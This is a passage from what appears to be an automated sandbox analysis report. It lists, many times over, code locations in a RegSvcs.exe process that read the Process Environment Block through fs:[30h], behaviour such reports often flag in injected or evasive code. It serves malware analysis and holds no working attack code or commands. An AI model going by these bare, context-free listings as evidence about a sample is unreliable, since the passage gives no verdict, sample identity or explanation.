          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014AC730 mov eax, dword ptr fs:[00000030h]5_2_014AC730
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0143C7C0 mov eax, dword ptr fs:[00000030h]5_2_0143C7C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B07C3 mov eax, dword ptr fs:[00000030h]5_2_014B07C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014527ED mov eax, dword ptr fs:[00000030h]5_2_014527ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014527ED mov eax, dword ptr fs:[00000030h]5_2_014527ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014527ED mov eax, dword ptr fs:[00000030h]5_2_014527ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014BE7E1 mov eax, dword ptr fs:[00000030h]5_2_014BE7E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014347FB mov eax, dword ptr fs:[00000030h]5_2_014347FB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014347FB mov eax, dword ptr fs:[00000030h]5_2_014347FB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014D678E mov eax, dword ptr fs:[00000030h]5_2_014D678E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014307AF mov eax, dword ptr fs:[00000030h]5_2_014307AF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014E47A0 mov eax, dword ptr fs:[00000030h]5_2_014E47A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0144C640 mov eax, dword ptr fs:[00000030h]5_2_0144C640
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014F866E mov eax, dword ptr fs:[00000030h]5_2_014F866E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014F866E mov eax, dword ptr fs:[00000030h]5_2_014F866E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146A660 mov eax, dword ptr fs:[00000030h]5_2_0146A660
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146A660 mov eax, dword ptr fs:[00000030h]5_2_0146A660
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01462674 mov eax, dword ptr fs:[00000030h]5_2_01462674
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014AE609 mov eax, dword ptr fs:[00000030h]5_2_014AE609
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0144260B mov eax, dword ptr fs:[00000030h]5_2_0144260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0144260B mov eax, dword ptr fs:[00000030h]5_2_0144260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0144260B mov eax, dword ptr fs:[00000030h]5_2_0144260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0144260B mov eax, dword ptr fs:[00000030h]5_2_0144260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0144260B mov eax, dword ptr fs:[00000030h]5_2_0144260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0144260B mov eax, dword ptr fs:[00000030h]5_2_0144260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0144260B mov eax, dword ptr fs:[00000030h]5_2_0144260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01472619 mov eax, dword ptr fs:[00000030h]5_2_01472619
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0144E627 mov eax, dword ptr fs:[00000030h]5_2_0144E627
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01466620 mov eax, dword ptr fs:[00000030h]5_2_01466620
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01468620 mov eax, dword ptr fs:[00000030h]5_2_01468620
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0143262C mov eax, dword ptr fs:[00000030h]5_2_0143262C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146A6C7 mov ebx, dword ptr fs:[00000030h]5_2_0146A6C7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146A6C7 mov eax, dword ptr fs:[00000030h]5_2_0146A6C7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014AE6F2 mov eax, dword ptr fs:[00000030h]5_2_014AE6F2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014AE6F2 mov eax, dword ptr fs:[00000030h]5_2_014AE6F2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014AE6F2 mov eax, dword ptr fs:[00000030h]5_2_014AE6F2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014AE6F2 mov eax, dword ptr fs:[00000030h]5_2_014AE6F2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B06F1 mov eax, dword ptr fs:[00000030h]5_2_014B06F1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B06F1 mov eax, dword ptr fs:[00000030h]5_2_014B06F1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01434690 mov eax, dword ptr fs:[00000030h]5_2_01434690
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01434690 mov eax, dword ptr fs:[00000030h]5_2_01434690
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146C6A6 mov eax, dword ptr fs:[00000030h]5_2_0146C6A6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014666B0 mov eax, dword ptr fs:[00000030h]5_2_014666B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B0946 mov eax, dword ptr fs:[00000030h]5_2_014B0946
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01504940 mov eax, dword ptr fs:[00000030h]5_2_01504940
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01456962 mov eax, dword ptr fs:[00000030h]5_2_01456962
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01456962 mov eax, dword ptr fs:[00000030h]5_2_01456962
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01456962 mov eax, dword ptr fs:[00000030h]5_2_01456962
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0147096E mov eax, dword ptr fs:[00000030h]5_2_0147096E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0147096E mov edx, dword ptr fs:[00000030h]5_2_0147096E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0147096E mov eax, dword ptr fs:[00000030h]5_2_0147096E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014D4978 mov eax, dword ptr fs:[00000030h]5_2_014D4978
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014D4978 mov eax, dword ptr fs:[00000030h]5_2_014D4978
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014BC97C mov eax, dword ptr fs:[00000030h]5_2_014BC97C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014AE908 mov eax, dword ptr fs:[00000030h]5_2_014AE908
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014AE908 mov eax, dword ptr fs:[00000030h]5_2_014AE908
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014BC912 mov eax, dword ptr fs:[00000030h]5_2_014BC912
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01428918 mov eax, dword ptr fs:[00000030h]5_2_01428918
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01428918 mov eax, dword ptr fs:[00000030h]5_2_01428918
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B892A mov eax, dword ptr fs:[00000030h]5_2_014B892A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014C892B mov eax, dword ptr fs:[00000030h]5_2_014C892B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014C69C0 mov eax, dword ptr fs:[00000030h]5_2_014C69C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0143A9D0 mov eax, dword ptr fs:[00000030h]5_2_0143A9D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0143A9D0 mov eax, dword ptr fs:[00000030h]5_2_0143A9D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0143A9D0 mov eax, dword ptr fs:[00000030h]5_2_0143A9D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0143A9D0 mov eax, dword ptr fs:[00000030h]5_2_0143A9D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0143A9D0 mov eax, dword ptr fs:[00000030h]5_2_0143A9D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0143A9D0 mov eax, dword ptr fs:[00000030h]5_2_0143A9D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014649D0 mov eax, dword ptr fs:[00000030h]5_2_014649D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014FA9D3 mov eax, dword ptr fs:[00000030h]5_2_014FA9D3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014BE9E0 mov eax, dword ptr fs:[00000030h]5_2_014BE9E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014629F9 mov eax, dword ptr fs:[00000030h]5_2_014629F9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014629F9 mov eax, dword ptr fs:[00000030h]5_2_014629F9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014429A0 mov eax, dword ptr fs:[00000030h]5_2_014429A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014429A0 mov eax, dword ptr fs:[00000030h]5_2_014429A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014429A0 mov eax, dword ptr fs:[00000030h]5_2_014429A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014429A0 mov eax, dword ptr fs:[00000030h]5_2_014429A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014429A0 mov eax, dword ptr fs:[00000030h]5_2_014429A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014429A0 mov eax, dword ptr fs:[00000030h]5_2_014429A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014429A0 mov eax, dword ptr fs:[00000030h]5_2_014429A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014429A0 mov eax, dword ptr fs:[00000030h]5_2_014429A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014429A0 mov eax, dword ptr fs:[00000030h]5_2_014429A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014429A0 mov eax, dword ptr fs:[00000030h]5_2_014429A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014429A0 mov eax, dword ptr fs:[00000030h]5_2_014429A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014429A0 mov eax, dword ptr fs:[00000030h]5_2_014429A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014429A0 mov eax, dword ptr fs:[00000030h]5_2_014429A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014309AD mov eax, dword ptr fs:[00000030h]5_2_014309AD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014309AD mov eax, dword ptr fs:[00000030h]5_2_014309AD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B89B3 mov esi, dword ptr fs:[00000030h]5_2_014B89B3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B89B3 mov eax, dword ptr fs:[00000030h]5_2_014B89B3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B89B3 mov eax, dword ptr fs:[00000030h]5_2_014B89B3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01442840 mov ecx, dword ptr fs:[00000030h]5_2_01442840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01460854 mov eax, dword ptr fs:[00000030h]5_2_01460854
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01434859 mov eax, dword ptr fs:[00000030h]5_2_01434859
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01434859 mov eax, dword ptr fs:[00000030h]5_2_01434859
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014BE872 mov eax, dword ptr fs:[00000030h]5_2_014BE872
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014BE872 mov eax, dword ptr fs:[00000030h]5_2_014BE872
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014C6870 mov eax, dword ptr fs:[00000030h]5_2_014C6870
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014C6870 mov eax, dword ptr fs:[00000030h]5_2_014C6870
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014BC810 mov eax, dword ptr fs:[00000030h]5_2_014BC810
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01452835 mov eax, dword ptr fs:[00000030h]5_2_01452835
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01452835 mov eax, dword ptr fs:[00000030h]5_2_01452835
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01452835 mov eax, dword ptr fs:[00000030h]5_2_01452835
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01452835 mov ecx, dword ptr fs:[00000030h]5_2_01452835
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01452835 mov eax, dword ptr fs:[00000030h]5_2_01452835
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01452835 mov eax, dword ptr fs:[00000030h]5_2_01452835
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146A830 mov eax, dword ptr fs:[00000030h]5_2_0146A830
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014D483A mov eax, dword ptr fs:[00000030h]5_2_014D483A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014D483A mov eax, dword ptr fs:[00000030h]5_2_014D483A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0145E8C0 mov eax, dword ptr fs:[00000030h]5_2_0145E8C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_015008C0 mov eax, dword ptr fs:[00000030h]5_2_015008C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014FA8E4 mov eax, dword ptr fs:[00000030h]5_2_014FA8E4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146C8F9 mov eax, dword ptr fs:[00000030h]5_2_0146C8F9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146C8F9 mov eax, dword ptr fs:[00000030h]5_2_0146C8F9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01430887 mov eax, dword ptr fs:[00000030h]5_2_01430887
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014BC89D mov eax, dword ptr fs:[00000030h]5_2_014BC89D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014E4B4B mov eax, dword ptr fs:[00000030h]5_2_014E4B4B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014E4B4B mov eax, dword ptr fs:[00000030h]5_2_014E4B4B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01502B57 mov eax, dword ptr fs:[00000030h]5_2_01502B57
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01502B57 mov eax, dword ptr fs:[00000030h]5_2_01502B57
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01502B57 mov eax, dword ptr fs:[00000030h]5_2_01502B57
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01502B57 mov eax, dword ptr fs:[00000030h]5_2_01502B57
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014C6B40 mov eax, dword ptr fs:[00000030h]5_2_014C6B40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014C6B40 mov eax, dword ptr fs:[00000030h]5_2_014C6B40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014FAB40 mov eax, dword ptr fs:[00000030h]5_2_014FAB40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014D8B42 mov eax, dword ptr fs:[00000030h]5_2_014D8B42
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01428B50 mov eax, dword ptr fs:[00000030h]5_2_01428B50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014DEB50 mov eax, dword ptr fs:[00000030h]5_2_014DEB50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0142CB7E mov eax, dword ptr fs:[00000030h]5_2_0142CB7E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01504B00 mov eax, dword ptr fs:[00000030h]5_2_01504B00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014AEB1D mov eax, dword ptr fs:[00000030h]5_2_014AEB1D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014AEB1D mov eax, dword ptr fs:[00000030h]5_2_014AEB1D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014AEB1D mov eax, dword ptr fs:[00000030h]5_2_014AEB1D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014AEB1D mov eax, dword ptr fs:[00000030h]5_2_014AEB1D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014AEB1D mov eax, dword ptr fs:[00000030h]5_2_014AEB1D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014AEB1D mov eax, dword ptr fs:[00000030h]5_2_014AEB1D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014AEB1D mov eax, dword ptr fs:[00000030h]5_2_014AEB1D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014AEB1D mov eax, dword ptr fs:[00000030h]5_2_014AEB1D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014AEB1D mov eax, dword ptr fs:[00000030h]5_2_014AEB1D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0145EB20 mov eax, dword ptr fs:[00000030h]5_2_0145EB20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0145EB20 mov eax, dword ptr fs:[00000030h]5_2_0145EB20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014F8B28 mov eax, dword ptr fs:[00000030h]5_2_014F8B28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014F8B28 mov eax, dword ptr fs:[00000030h]5_2_014F8B28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01450BCB mov eax, dword ptr fs:[00000030h]5_2_01450BCB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01450BCB mov eax, dword ptr fs:[00000030h]5_2_01450BCB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01450BCB mov eax, dword ptr fs:[00000030h]5_2_01450BCB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01430BCD mov eax, dword ptr fs:[00000030h]5_2_01430BCD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01430BCD mov eax, dword ptr fs:[00000030h]5_2_01430BCD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01430BCD mov eax, dword ptr fs:[00000030h]5_2_01430BCD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014DEBD0 mov eax, dword ptr fs:[00000030h]5_2_014DEBD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01438BF0 mov eax, dword ptr fs:[00000030h]5_2_01438BF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01438BF0 mov eax, dword ptr fs:[00000030h]5_2_01438BF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01438BF0 mov eax, dword ptr fs:[00000030h]5_2_01438BF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0145EBFC mov eax, dword ptr fs:[00000030h]5_2_0145EBFC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014BCBF0 mov eax, dword ptr fs:[00000030h]5_2_014BCBF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01440BBE mov eax, dword ptr fs:[00000030h]5_2_01440BBE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01440BBE mov eax, dword ptr fs:[00000030h]5_2_01440BBE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014E4BB0 mov eax, dword ptr fs:[00000030h]5_2_014E4BB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014E4BB0 mov eax, dword ptr fs:[00000030h]5_2_014E4BB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01436A50 mov eax, dword ptr fs:[00000030h]5_2_01436A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01436A50 mov eax, dword ptr fs:[00000030h]5_2_01436A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01436A50 mov eax, dword ptr fs:[00000030h]5_2_01436A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01436A50 mov eax, dword ptr fs:[00000030h]5_2_01436A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01436A50 mov eax, dword ptr fs:[00000030h]5_2_01436A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01436A50 mov eax, dword ptr fs:[00000030h]5_2_01436A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01436A50 mov eax, dword ptr fs:[00000030h]5_2_01436A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01440A5B mov eax, dword ptr fs:[00000030h]5_2_01440A5B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01440A5B mov eax, dword ptr fs:[00000030h]5_2_01440A5B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146CA6F mov eax, dword ptr fs:[00000030h]5_2_0146CA6F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146CA6F mov eax, dword ptr fs:[00000030h]5_2_0146CA6F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146CA6F mov eax, dword ptr fs:[00000030h]5_2_0146CA6F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014DEA60 mov eax, dword ptr fs:[00000030h]5_2_014DEA60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014ACA72 mov eax, dword ptr fs:[00000030h]5_2_014ACA72
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014ACA72 mov eax, dword ptr fs:[00000030h]5_2_014ACA72
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014BCA11 mov eax, dword ptr fs:[00000030h]5_2_014BCA11
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146CA24 mov eax, dword ptr fs:[00000030h]5_2_0146CA24
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0145EA2E mov eax, dword ptr fs:[00000030h]5_2_0145EA2E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01454A35 mov eax, dword ptr fs:[00000030h]5_2_01454A35
